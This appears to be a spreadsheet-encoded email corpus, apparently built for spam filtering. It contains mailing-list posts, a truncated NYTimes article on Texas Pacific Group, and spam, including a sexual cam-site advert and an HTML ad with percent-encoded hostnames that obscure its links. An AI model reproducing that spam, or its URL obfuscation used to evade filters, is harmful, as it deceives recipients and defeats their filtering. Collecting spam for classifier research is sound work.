 &gt; --
 &gt; 	It may look like I'm just sitting here doing nothing,
 &gt;    but I'm really actively waiting for all my problems to go away.
 &gt; 
 &gt; 	 If you're not having fun, you're not doing it right!
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-users mailing list
 &gt; Exmh-users@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-users
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Documentum Acquires E-Room, Melding Content, Collaboration
</t>
  </si>
  <si>
    <t xml:space="preserve">"Groove really has people running scared"
 ....oh shit here comes that Groove thingy, run for your life ;-)
 ----- Original Message -----
 From: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 To: &lt;fork@example.com&gt;
 Sent: Friday, October 04, 2002 8:12 PM
 Subject: Documentum Acquires E-Room, Melding Content, Collaboration
 &gt;
 &gt; Don't know much about eRoom - but there is the magic phrase 'collaborate
 in
 &gt; real-time'... Groove really has people running scared. Wonder if any users
 &gt; actually /benefit/ from collaborating in real-time.
 &gt;
 &gt;
 &gt; ===
 &gt; http://www.internetwk.com/breakingNews/INW20021004S0001
 &gt;
 &gt; Content-management vendor Documentum said late Thursday it plans to
 acquire
 &gt; privately held e-Room Technologies in a deal worth about $100 million.
 &gt;
 &gt; Documentum will issue approximately 7.7 million shares of its common stock
 &gt; and pay about $12.6 million in cash for all of the outstanding shares of
 &gt; eRoom.
 &gt;
 &gt; Documentum makes a platform for enterprise-wide content management. ERoom
 &gt; makes tools for enterprise collaboration. Its customers include Airbus,
 &gt; Bausch &amp; Lomb, Ford Motor Co., and Sony.
 &gt;
 &gt; Documentum announced plans this summer to deliver a new Collaboration
 &gt; Edition of its content-management suite. ERoom was already integrating its
 &gt; tools to the Documentum platform, making an acquisition an easy target,
 &gt; according to Documentum president and CEO Dave DeWalt.
 &gt;
 &gt; With the upcoming joint product, customers will be able to collaborate in
 &gt; real-time via virtual workspaces, sharing schedules, resources, and even
 &gt; jointly creating content.
 &gt;
 &gt; Content creation and management has always been a collaborative task, but
 &gt; workflow has usually been delivered via a Web browser interface or even
 &gt; simple e-mail -- and rarely in real-time.
 &gt;
 &gt; For now, Documentum will sell the eRoom platform and its own
 &gt; content-management system through combined sales channels. Further
 &gt; integration is planned down the line, the companies said.
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tell these cam sluts what to do
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;FONT SIZE=1 COLOR="000000"&gt;To be removed please click &lt;A HREF=http://www.listmgmt.com/delete.php?email=zzzz@spamassassin.taint.org&gt;here&lt;/A&gt; or simply respond to this email.&lt;BR&gt; Your address will be removed and blocked from ever being added again. &lt;Br&gt;
 Please scroll down to the bottom of this email for more details.
 &lt;P&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Tricams Live Cam Girls&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY TEXT="#000000" BGCOLOR="#FFBA00"&gt;
 &lt;TABLE CELLSPACING=0 BORDER=0 CELLPADDING=7 WIDTH=650&gt;
 &lt;TR&gt;&lt;TD VALIGN="CENTER" COLSPAN=3&gt;&lt;CENTER&gt;
 &lt;IMG SRC="http://www.listmgmt.com/images/top.gif"&gt;
 &lt;BR&gt;&lt;B&gt;&lt;CENTER&gt;ALL THESE SHOWS ARE LIVE RIGHT NOW!&lt;/CENTER&gt;&lt;/b&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;&lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;CENTER&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Ahotsexycouple/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Ahotsexycouple.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Ahotsexycouple&lt;/B&gt;
 &lt;/TD&gt;
 &lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Sensuality/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Sensuality.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Sensuality&lt;/B&gt;
 &lt;/TD&gt;
 &lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Candice/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Candice.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Candice&lt;/B&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;&lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Sui_lei/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Sui_lei.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Sui_lei&lt;/B&gt;
 &lt;/TD&gt;
 &lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Wild_cat/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Wild_cat.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Wild_cat&lt;/B&gt;
 &lt;/TD&gt;
 &lt;TD WIDTH="33%" VALIGN="CENTER"&gt;
 &lt;A HREF="http://www.listmgmt.com/fci/Azcple/"&gt;&lt;IMG SRC="http://www.listmgmt.com/fci/Azcple.jpg" BORDER=0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;B&gt;&lt;IMG SRC="http://www.listmgmt.com/images/live.gif"&gt; &lt;FONT COLOR=red&gt;Azcple&lt;/B&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;&lt;TD VALIGN="CENTER" COLSPAN=3&gt;
 &lt;CENTER&gt;
 &lt;B&gt;What in the world are you waiting for?  Click now and tell any of these women what to do for you live on camera.  Don't be shy, just signup for free and tell them what you want and you will get.&lt;P&gt;
 &lt;A HREF=""&gt;&lt;FONT COLOR=RED size=5&gt;&lt;b&gt;CLICK HERE FOR THE FREE LIVE SHOW!&lt;/Font&gt;&lt;/A&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;P&gt;&lt;BR&gt;
 &lt;A HREF="http://www.listmgmt.com/ars/PIL/"&gt;&lt;IMG SRC="http://www.listmgmt.com/ars/images/pillshop.gif" BORDER=0&gt;&lt;/a&gt; 
 &lt;A HREF="http://www.listmgmt.com/ars/PL/"&gt;&lt;IMG SRC="http://www.listmgmt.com/ars/images/howtogrow.gif" BORDER=0&gt;&lt;/a&gt; 
 &lt;A HREF="http://www.listmgmt.com/ars/DB/"&gt;&lt;IMG SRC="http://www.listmgmt.com/ars/images/discreet.gif" BORDER=0&gt;&lt;/a&gt; 
 &lt;P&gt;&lt;BR&gt;
 This is our central mailing for all of our affiliate sites.  If you have a question on how you got on, please &lt;A HREF="mailto:webmaster@listmgmt.com"&gt;email&lt;/A&gt; us and we will be glad to help.&lt;BR&gt;
 The fastest way to get off our list is to click this &lt;A HREF=http://www.listmgmt.com/delete.php?email=zzzz@spamassassin.taint.org&gt;link&lt;/A&gt;.  If you do not have access to it, please respond to this email. &lt;BR&gt;
 Please make sure to include this email address as it is the one on our list. zzzz@spamassassin.taint.org 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 3D Motion Capture
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;script language="JavaScript"&gt;
 &lt;!--
 function MM_findObj(n, d) { //v3.0
   var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))&gt;0&amp;&amp;parent.frames.length) {
     d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
   if(!(x=d[n])&amp;&amp;d.all) x=d.all[n]; for (i=0;!x&amp;&amp;i&lt;d.forms.length;i++) x=d.forms[i][n];
   for(i=0;!x&amp;&amp;d.layers&amp;&amp;i&lt;d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); return x;
 }
 function MM_swapImage() { //v3.0
   var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i&lt;(a.length-2);i+=3)
    if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
 }
 function MM_swapImgRestore() { //v3.0
   var i,x,a=document.MM_sr; for(i=0;a&amp;&amp;i&lt;a.length&amp;&amp;(x=a[i])&amp;&amp;x.oSrc;i++) x.src=x.oSrc;
 }
 function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i&lt;a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
 }
 //--&gt;
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" onLoad="MM_preloadImages('http://www.%74er%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r2_c2_f2.gif');"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="600"&gt;
 &lt;!-- fwtable fwsrc="ANIMAT~1.PNG" fwbase="Football Guy.gif" fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="0" --&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="303" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="196" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="101" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan="3"&gt;&lt;img name="FootballGuy_r1_c1" src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r1_c1.gif" width="600" height="302" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="1" height="302" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td rowspan="2"&gt;&lt;img name="FootballGuy_r2_c1" src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r2_c1.gif" width="303" height="98" border="0"&gt;&lt;/td&gt;
     &lt;td&gt;&lt;a href="http://www.%74%65r%52%61.es/personal8/greatlead6/index.htm" onMouseOut="MM_swapImgRestore();"  onMouseOver="MM_swapImage('FootballGuy_r2_c2','','http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r2_c2_f2.gif',1);" &gt;&lt;img name="FootballGuy_r2_c2" src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r2_c2.gif" width="196" height="48" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td rowspan="2"&gt;&lt;img name="FootballGuy_r2_c3" src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r2_c3.gif" width="101" height="98" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="1" height="48" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img name="FootballGuy_r3_c2" src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/Football Guy_r3_c2.gif" width="196" height="50" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://www.%74%65r%52%61.es/personal8/greatlead6/images/Ad/spacer.gif" width="1" height="50" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif"&gt;To &lt;font color="#FF0000"&gt;UNSUBSCRIBE&lt;/font&gt; 
   simply &lt;font color="#FF0000"&gt;REPLY&lt;/font&gt; to this email with &lt;font color="#FF0000"&gt;REMOVE&lt;/font&gt; 
   in the &lt;font color="#FF0000"&gt;SUBJECT&lt;/font&gt; &lt;font color="#FF0000"&gt;LINE&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --hdW7zL/qDS6RXdAL
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Aug 23, 2002 at 03:03:05PM -0400, Rose, Bobby wrote:
 &gt; If you didn't add it when compile would be one way.  Another would be to
 &gt; grep your sendmail.cf for the word Milter.
 I don't know if there's a sendmail-ish way (it's not in the -d0.1 output),
 but this should work:
 $ strings `which sendmail` | grep -i milter
 If you get a long list of function/message looking phrases, milter
 is built-in.  If you get something like:
 Warning: Filter usage ('X') requires Milter support (-DMILTER)
 Milter Warning: Option: %s requires Milter support (-DMILTER)
 @(#)$Id: milter.c,v 1.1.1.2 2002/03/12 18:00:36 zarzycki Exp $
 then it's not built-in. :)
 --=20
 Randomly Generated Tagline:
 "M: Can anyone tell us the lesson that has been learned here?
   S: Yes Master, not a single one of us could defeat you.
   M: You gain wisdom child ... "            - The Frantics
 --hdW7zL/qDS6RXdAL
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9ZoiKAuOQUeWAs2MRAnJ0AJ9ruH+VXGGz/0mrSNVPQljjksTKEQCfSN2h
 eED/03ARYS9odlD3qfuuFbA=
 =nBsE
 -----END PGP SIGNATURE-----
 --hdW7zL/qDS6RXdAL--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</si>
  <si>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Automated forwarding
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi Folks,
 I've been trying to set a button called which automatically
 forwards mail using a '-form mycomps' without going through
 the editor, but so far haven't got the right recipe.
 I currently have in my .exmh-defaults:
 *Mops.spam.text:        Spam
 *Mops.spam.command:     Msg_Forward -form spamcomps -noedit -nowhatnowproc ; Msg
 _Remove
 I've also tried with "SeditSend {$draft $t 0}" after the forward command.
 It should forward to a spam address (where filters get adjusted) and then
 delete.  It does so, but not without producing the edit window.
 Any help appreciated.
 Wendy Roberts
 ===========================================
 Wendy Roberts          
 HEAD System Administrator                             
 High Energy Astrophsics Division
 Harvard-Smithsonian Center for Astrophysics
 Cambridge, MA USA 02138
 wendy@cfa.harvard.edu  
 Phone:  617-495-7153  
 ===========================================
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hah.  I guess she doesn't want everyone to know about all the kinky sex 
 she and I have had.  LOL
 C
 On Sat, 7 Sep 2002, Geege Schuman wrote:
 &gt; cdale is a double chocolate chip macadamia to my vanilla wafer.  wait, maybe
 &gt; i'm a ginger snap.
 &gt; 
 &gt; &lt;cough&gt;
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Russell Turpin
 &gt; Sent: Saturday, September 07, 2002 11:06 AM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; Robert Harley:
 &gt; &gt;It is perfectly obvious that (heterosexual) promiscuity is exactly,
 &gt; &gt;precisely identical between males and females.
 &gt; 
 &gt; Yeah, assuming approximately equal populations.
 &gt; But that obscures the different modes of
 &gt; promiscuity. Both the person who gives sex for
 &gt; money or power or companionship and the person
 &gt; who uses money and power and companionship to
 &gt; get sex are promiscuous, in the broadest sense
 &gt; of the word. But their motives and behavior are
 &gt; quite different.
 &gt; 
 &gt; Langur monkeys were the example in the cited
 &gt; article. "Dominant males .. kill babies that
 &gt; are not their own." "The dominant male monkey
 &gt; .. seeks to defend his harem of females." But
 &gt; cozying up to the current dominant male isn't
 &gt; the best strategy for female langurs, because
 &gt; "dominant males are dethroned by rivals every
 &gt; 27 months or so." "By mating with as many
 &gt; extra-group males as possible, female langurs
 &gt; ensure their offspring against infanticide,"
 &gt; by the male who is likely next to rule the
 &gt; roost.
 &gt; 
 &gt; Maybe it's just me, but that doesn't paint a
 &gt; picture of carefree females engaged in joyously
 &gt; promiscuous couplings. The dom cab driver who
 &gt; is taking her two boy toys to New Orleans is a
 &gt; better picture of that. ;-)
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _________________________________________________________________
 &gt; Chat with friends online, try MSN Messenger: http://messenger.msn.com
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Texas Pacific Goes Where Others Fear to Spend
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by khare@alumni.caltech.edu.
 Texas Pacific, in addition to its multibillion dollar portfolio detailed below, actually does invest in promising new companies, not just turnarounds. It's just that KnowNow is waaay to small of a part of their $7.2B portfolio... so far!
 Rohit
 khare@alumni.caltech.edu
 Texas Pacific Goes Where Others Fear to Spend
 August 25, 2002
 By RIVA D. ATLAS and EDWARD WONG 
 It was one of the first calls David N. Siegel placed when
 he became chief executive of the beleaguered US Airways
 last March. Seeking advice on how to hammer out a leaner
 and meaner business plan, keep his planes flying and
 renegotiate costly contracts with the unions, he flipped
 through his files and found the number for the Texas
 Pacific Group, an investment firm headed by David
 Bonderman, a former civil rights lawyer with a reputation
 for fixing problem companies. 
 Mr. Siegel, once a top executive at Continental Airlines,
 had watched Texas Pacific's partners turn an investment of
 $66 million in the airline, made three years after it filed
 for bankruptcy in 1990, into a profit of more than $600
 million. And they had made nearly as much on their stake in
 America West, which filed for bankruptcy in 1992. 
 That search for advice turned into an offer. Why not let
 Texas Pacific have a role in US Airways' revival? asked
 Richard Schifter, the Texas Pacific executive whom Mr.
 Siegel reached. 
 In June, Mr. Siegel called Mr. Schifter again. And days
 before US Airways announced its plans to file for
 bankruptcy two weeks ago - but after it had negotiated
 about $550 million in concessions with its unions - Texas
 Pacific, based in Fort Worth and San Francisco, agreed to
 kick in $100 million as part of a $500 million loan to keep
 the company operating during bankruptcy. It also agreed to
 buy $200 million of stock, or 38 percent of the company,
 and take 5 of 13 seats on the board if US Airways emerges
 from bankruptcy - unless another investor surfaces with a
 better offer. 
 "One of the reasons we were interested is few other folks
 were," said James Coulter, a partner at Texas Pacific, in
 an interview after the bankruptcy filing. "There aren't
 many people around with the stomach or the knowledge to
 delve into the airline industry." 
 Texas Pacific, which manages $8 billion, thrives by buying
 businesses no one else wants. Mr. Coulter and Mr. Bonderman
 made their names during the recession of the early 1990's
 with investments in Continental and America West. The
 firm's hallmark is to take an active hand in shaping
 companies, sometimes ousting poor managers and tapping its
 extensive network of contacts for talented replacements. 
 Now the partners are again looking for trouble. In the last
 year alone, Texas Pacific has announced or completed six
 acquisitions, most in unloved industries like
 semiconductors, reinsurance and airlines. Just last month,
 it announced plans to buy Burger King, which has been
 losing market share, for $2.26 billion. It is also bidding
 for Bankgesellschaft Berlin, a large and troubled bank. 
 The most creative, and potentially lucrative, of these
 deals could be Texas Pacific's acquisition last November of
 MEMC Electronic Materials, a semiconductor company, for $6
 - yes, just $6 - in cash. It will also guarantee a $150
 million bank loan. 
 In the last few years, most firms that specialize in
 leveraged buyouts - the use of junk bonds, bank loans and
 other borrowings to buy or take big stakes in companies -
 have been largely inactive. Falling stock prices have made
 managements reluctant to sell cheaply. Companies that are
 for sale have tangled finances or face a cash squeeze. 
 Texas Pacific is different. "This is a terrific environment
 for them," said Stephen Schwarzman, chief executive of the
 Blackstone Group, which also specializes in buyouts. 
 Mark Attanasio, a managing director at Trust Company of the
 West, which has invested with Texas Pacific, said: "Most
 other buyout firms want to buy companies that are growing.
 You don't see many guys wanting to take on operational
 fixes." 
 Like most other buyout firms, Texas Pacific tries to keep
 its inner workings private: its partners rarely grant
 interviews and its Web site is perpetually under
 construction. Mr. Bonderman, Mr. Coulter and William Price,
 the third founding partner, declined to be interviewed for
 this article. 
 Mr. Bonderman, 59, is known for his rumpled shirts and
 bright, patterned socks. "He likes argyle socks, and they
 tend to fall down around his ankles," said Henry Miller, an
 investment banker who advises troubled companies. Early in
 his career, when he was a Washington lawyer, Mr. Bonderman
 argued a case in court wearing a brown velvet suit. 
 When a Texas Pacific deal is being negotiated, he is known
 for obsessively staying in touch, even when he is trekking
 in places like Pakistan, Nepal and, most recently, Bhutan.
 "Whenever I see a long, unfamiliar phone number pop up on
 my caller I.D., I know it's David calling," said one
 investment banker who often works with Mr. Bonderman. 
 Mr. Bonderman made his reputation in the 1980's as the
 chief investment officer for Robert Bass, the Texas oilman.
 Mr. Bonderman enriched Mr. Bass a second time by making
 early bets in industries like cable television and taking
 stakes in troubled companies like American Savings &amp; Loan,
 which had been seized by the government. Over nearly a
 decade, Mr. Bonderman's picks earned an average annual
 return of 63 percent for Mr. Bass. 
 In 1993, Mr. Bonderman struck out on his own with Mr.
 Coulter, a former Lehman Brothers banker who had also
 worked for Mr. Bass. They teamed up later that year with
 Mr. Price, a veteran of GE Capital Capital and Bain &amp;
 Company, a consulting firm, to form Texas Pacific. 
 The three men have complementary skills, investment bankers
 and other deal makers said. Mr. Bonderman is the master
 strategist and Mr. Coulter is good at structuring deals and
 the detailed management of the firm's purchases. Mr. Price
 often recruits managers and advises on operational issues. 
 "David is very much the optimist, very much the deal
 maker," said Greg Brenneman, a former president of
 Continental. "Jim is very much a counterbalance to David.
 He will sit back and ask the tough questions. He will
 approach investments a little bit more skeptically than
 David does." 
 By the end of the 1990's, Texas Pacific was well
 established in deal making. It easily raised $4.5 billion
 from pension funds and other investors in early 2000. To
 celebrate their war chest, the firm's partners rented San
 Francisco's City Hall and hired the B-52's to play at a
 party. 
 But as the stock market began to tumble, Texas Pacific
 hesitated. For a 17-month stretch, the partners made no
 deals. They checked out some of the biggest corporate
 blowups, including Adelphia, Xerox and Global Crossing, but
 stayed away, finding the prices and the quality of the
 businesses untenable. 
 Instead, Texas Pacific began to hastily exit some existing
 investments, taking more than $2 billion in profits during
 that stretch. 
 "They started to cash out early in the cycle," said Mario
 Giannini, chief executive of Hamilton Lane, a money
 management firm, some of whose clients are Texas Pacific
 investors. 
 The good times of the late 1990's were not ideal for Texas
 Pacific - it struggled to find downtrodden companies that
 needed its help. 
 But Texas Pacific did manage to spot a few diamonds in the
 rough. It revived Oxford Health Plans, the health
 maintenance organization that nearly collapsed in the
 mid-1990's, almost doubling its money after bringing in new
 managers and upgrading computer systems. In 1996, it made a
 $280 million investment in Ducati Motor, the Italian
 motorcycle maker, whose profits have since more than
 quadrupled. 
 But Texas Pacific also stumbled, usually when it bought at
 the top of the market. Texas Pacific's $560 million
 investment in the J. Crew Group, the clothing retailer, for
 which it paid a steep price of 10 times cash flow in 1997,
 has been a disappointment. So has its 1999 purchase of
 Bally, the shoe maker, which has suffered from lower demand
 for luxury goods. 
 Texas Pacific also lost more than $100 million on Zilog, a
 semiconductor company, and Favorite Brands, a candy maker,
 both of which filed for bankruptcy. 
 Some of these investments have taken a toll on the firm's
 performance. Texas Pacific is still selling off holdings in
 two investment funds it raised over the last decade. The
 first fund, a $720 million portfolio raised in 1993 and
 including investments made through March 1997, should
 return more than 40 percent, according to one Texas Pacific
 investor. But its second fund - $2.5 billion raised in 1997
 - could return less than half that, this investor
 estimated, since the firm had less time to take profits on
 these investments before the stock market sank. 
 But because Texas Pacific has not sold many of its holdings
 in the second fund, profits on these investments could
 rebound. It is hoping, for example, that with new
 management in place, J. Crew will turn around as the
 economy rebounds. In any case, one competitor said, "their
 returns look pretty good when you consider that some other
 funds won't return any capital" to investors. 
 But with the weak economy throwing many companies into
 trouble, Texas Pacific seems poised to repeat its earlier
 success, the investor said. "They should do exceptionally
 well," he said. 
 Texas Pacific has a distinct style - if not formula. It
 relies on talented, self-sufficient managers to restructure
 troubled companies, preferring to remain hands-off, except
 for surveillance from the boardroom. When necessary, it
 replaces managers. 
 Less than a year after Continental emerged from bankruptcy,
 for example, Mr. Bonderman watched with frustration as his
 old friend Robert R. Ferguson, the chief executive, led it
 to the edge of another trip to bankruptcy court. 
 Continental's board, where Mr. Bonderman was chairman, then
 brought in Gordon M. Bethune, an executive at Boeing, and
 in October 1994 he replaced Mr. Ferguson as chief
 executive. Mr. Bethune quickly did a top-to-bottom overhaul
 of the company and is now considered a great turnaround
 artist of the industry. 
 "The biggest conflict I've ever seen was with Bob
 Ferguson," said Clark Onstad, a former general counsel for
 the Federal Aviation Administration, in describing the
 thinking of Mr. Bonderman, whom he has known since the 1982
 Braniff bankruptcy. "He chose Bethune over his longtime
 friend Ferguson because he thought Bethune would do a
 better job." 
 At America West, Texas Pacific initiated an even more
 extensive management overhaul. This time, the charge was
 led by Mr. Coulter and Mr. Schifter, both directors. 
 W. Douglas Parker, the current chief executive, flew to Mr.
 Coulter's home in San Francisco to interview for the job of
 chief financial officer. They talked for hours, and Mr.
 Parker said the two men quickly realized they had "somewhat
 kindred spirits." 
 The board replaced most senior managers at America West,
 except William Franke, the chief executive, who stepped
 down last September. His restructuring plan had made the
 airline profitable a year and a half before it emerged from
 bankruptcy in August 1994. 
 Texas Pacific owns just 3 percent of America West, worth
 about $33.7 million. But those are controlling shares, and
 the group holds more than 50 percent of the votes. 
 "These are not passive investors, nor am I," said Donald L.
 Sturm, a Denver businessman who serves on Continental's
 board with Mr. Bonderman and Mr. Price. "You're active.
 Your money is at stake. Your reputation is at stake." 
 After overseeing managers who worked successfully with
 unions at Continental and America West, Texas Pacific has a
 good reputation with labor. That was one reason US Airways
 was interested in a Texas Pacific investment, said Chris
 Chiames, a spokesman for the airline. 
 Mr. Siegel wanted an investor who would "be as labor
 friendly as possible," Mr. Chiames said. But US Airways can
 still entertain other bids this fall, and Marvin Davis, the
 billionaire investor from Los Angeles, has expressed
 interest. 
 Texas Pacific's investment in Burger King, made with
 Goldman, Sachs and Bain Capital, was announced after two
 years of discussions among Texas Pacific's partners and the
 chain's franchisees - even before the company, which had
 been owned by Diageo, the liquor company, was put up for
 sale, said Julian Josephson, chairman of the National
 Franchisee Association, which represents most Burger King
 franchisees. 
 "We liked what they had to say about the human component of
 the businesses they buy," Mr. Josephson said. Many other
 owners, he added, "are dismissive of labor." 
 At Burger King, Texas Pacific will also be working with an
 executive it knows. Burger King's chief executive is John
 Dasburg, the former chief executive of Northwest Airlines,
 who met Mr. Bonderman and his partners when Northwest
 bought out their stake in Continental in 1998. 
 Unlike most buyout firms, Texas Pacific remains enamored
 with the technology industry, despite the failure of so
 many start-ups the last two years. It has focused on the
 semiconductor industry, which like the airline industry is
 highly cyclical. So far, though, results have been mixed. 
 The firm's 1996 acquisition of the Paradyne Corporation,
 which makes equipment for high-speed Internet connections,
 has been a huge success. Texas Pacific split it in two and
 took both parts public in the late 1990's, selling most of
 its stakes for 23 times its investment. But a much larger
 investment, its $400 million acquisition of Zilog, the chip
 maker, in 1998, was made just before the economic crisis in
 Asia caused chip prices to plummet. Zilog filed for
 bankruptcy last year. 
 Texas Pacific is still hoping for a turnaround at a third
 company, ON Semiconductor, which it acquired for $1.6
 billion three years ago. It invested $100 million more last
 year. 
 Its latest gamble on the industry, the $6 deal for MEMC,
 may prove the most lucrative. The cost of mailing the
 payment to E.On, based in Dsseldorf, Germany, was actually
 more than the acquisition, one executive close to the deal
 said. 
 Texas Pacific, and its partners in the deal, Trust Company
 of the West and Leonard Green &amp; Partners, agreed to
 guarantee a $150 million revolving line of credit. Texas
 Pacific also assumed $900 million worth of debt, most of
 which it swapped for more stock in the company. 
 "They did a good job of timing the acquisition," said
 Nabeel Gareeb, the company's chief executive, who noted
 that in the last quarter MEMC reported its first profit
 since the fourth quarter of 2000. 
 But Texas Pacific's interest in airlines is clearly
 sizable. Besides its involvement in Continental, America
 West and US Airways, the company plans to buy Gate Gourmet,
 the catering business of the bankrupt Swissair Group. 
 Two years ago, Texas Pacific started a Web-based discount
 ticket service called Hotwire. It put up most of the $75
 million in seed money, then persuaded six airlines to
 invest with it, said Karl Peterson, the chief executive.
 Hotwire, instead of asking consumers to bid on tickets, as
 Priceline does, shows the cheapest ticket on its Web site
 but does not reveal the exact flight and travel time until
